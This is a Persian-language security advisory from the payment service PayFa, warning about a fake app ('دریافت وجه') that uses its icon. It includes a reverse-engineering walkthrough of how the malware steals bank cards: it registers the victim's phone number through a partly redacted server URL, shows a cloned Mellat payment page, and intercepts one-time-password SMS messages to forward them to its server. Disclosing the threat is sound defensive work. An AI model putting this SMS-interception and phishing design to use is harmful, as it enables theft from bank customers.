“پی فا” بعد از فراز و نشیبهای بسیاری که از ابتدای کار خود تا کنون طی کرده، در حال حاضر در مسیر رشد و پیشرفت است. اما در این مسیر با مشکلات بیشماری روبهرو شده که با تکیه بر تجارب مدیران و استفاده از دانش کارشناسان حرفهای، درصدد حل و فصل آنها برآمده و سختیهای مسیر را پشت سر گذاشته است. به همین دلیل پی فا با مشکلات بیگانه نیست؛ چرا که همیشه افرادی هستند که به قطارهای در حال حرکت سنگاندازی کنند و مانعی برای پیشرفت باشند.
کلاهبرداران این بار با جعل اپلیکیشن پی فا به دنبال سوء استفاده از کاربران و سرقت اطلاعات کارت بانکی آنها هستند. مهاجمان با سوء استفاده از نام و هویت پی فا سعی میکنند، حملات فیشینگ انجام دهند و با بدافزارهای موجود به سرقت اطلاعات کاربران بپردازند. پی فا این اقدام مجرمانه را محکوم میکند و نگران مشکلاتی است که توسط این اپلیکیشن جعلی، گریبانگیر برخی کاربران ناآگاه میشود.
کاربران باید در نظر داشته باشند که پی فا در حال حاضر هیچگونه اپلیکیشنی بر روی سیستم عاملهای ios و android ندارد و تنها مرجع معتبر آن سایت payfa بر روی دامنههای ir. و com. است. پیش از این پی فا در اطلاعیههای رسمی خود اعلام کرده بود که هیچگونه اپلیکیشنی ندارد و در برابر سوء استفادههای احتمالی مسئولیتی نخواهد داشت.
آنالیز بدافزار (دریافت وجه) با آیکون پی فا
بدافزاری به نام “دریافت وجه” با سوءاستفاده از آیکون پی فا، به منظور فریب کاربران برای سرقت اطلاعات بانکی آنها ایجاد شده است. این روزها اپلیکیشن “دریافت وجه” در کانالهایی تحت عنوان “ادد کنید پول دریافت کنید” با تکنیک بازاریابی ویروسی دست به دست میشود. این اقدام از دید پی فا دور نمانده و به سرعت به این اقدام رسیدگی نموده است. در ادامه تیم فنی پی فا، با استفاده از تکنیک مهندسی معکوس به تشریح و بررسی فنی این بدافزار میپردازد.
نحوه عملکرد بد افزار (دریافت وجه)
این بدافزار پس از نصب و اجرا، ابتدا دسترسی فعال شدن ارسال و خواندن SMS را از کاربر دریافت میکند. سپس شماره موبایل قربانی را دریافت کرده و به سرور اختصاصی خود به فایل Request.php ارسال مینماید.
https://exXXeXXs-noXXXs.XX/request.php?phone=09123456789&port=88084&info=install
پس از گذر از صفحه اول، این بدافزار در صفحه اصلی با استفاده از کامپوننت (WebView) صفحه جعلی درگاه را نمایش میدهد. این صفحه درگاه برای گمراه کردن کاربران، مشابه صفحه «بهپرداخت ملت» شبیهسازی شده است. تصاویر منتشر شده از این اپلیکیشن نشان میدهد که صفحات جعلی به خوبی پیادهسازی شده و زمینه برای فریب خوردن کاربران آماده است.
بعد از مشاهده این صفحات، قربانی اطلاعات کارت بانکی خود را وارد مینماید. این اطلاعات توسط سرور بد افزار درخواستی، روی یک درگاه پرداخت (بررسی نشده و نامعتبر) دریافت میشود. در همین لحظه پیامک بانک حاوی رمز پویا با استفاده از تابع (onReceive) کلاس (BroadcastReceiver) به سرور بدافزار ارسال میشود.
بدافزار، پیامکهای دریافتی قربانی را رصد میکند. پس از آنکه قربانی پیامک حاوی رمز پویا را دریافت کرد، بدافزار نیز آن را رصد میکند. در این لحظه صاحب بدافزار به اطلاعات کارت قربانی و رمز پویای او دسترسی دارد. در ادامه مراحل تکمیلی این بدافزار جعلی قابل مشاهده است.
1- بررسی کد بد افزار
MainActivity.java -2
- دریافت مجوز استفاده از سرویس SMS
- بررسی شماره موبایل ورودی
- ثبت شماره موبایل قربانی در سرور بد افزار
- انتقال قربانی به MainActivity2
MainActivity2.java -3
نمایش صفحه جعلی پرداخت
https://xsl- shapark.XXX/Ads/?e=88084&P=Mellat
connect.java -4
ارسال اطلاعت به سرور بد افزار (شماره موبایل، پیامک)
MyReceiver.java -5
شنود پیامک و ارسال متن پبامک به کلاس (connect) جهت ارسال به سرور بد افزار
در پایان لازم به ذکر است که پی فا درباره استفاده از اپلیکیشنهای غیرمجاز و جعلی به کاربران هشدار میدهد و از آنها میخواهد که از نصب و راهاندازی برنامههای مشکوک بر روی تلفن همراه خود، خودداری نمایند. همچنین این شرکت تاکید میکند که هیچ مسئولیتی در قبال خطرات احتمالی ناشی از سوء استفاده از نام پی فا ندارد و برنامههای خود را از طریق مراجع معتبر و رسمی خود به مخاطبان معرفی میکند. استفاده از نام و هویت پی فا بدون اطلاع قبلی این شرکت، اقدامی مجرمانه است و افرادی که به قصد فریبکاری و کلاهبرداری از نام این شرکت سوءاستفاده کنند، تحت پیگرد قانونی قرار میگیرند.
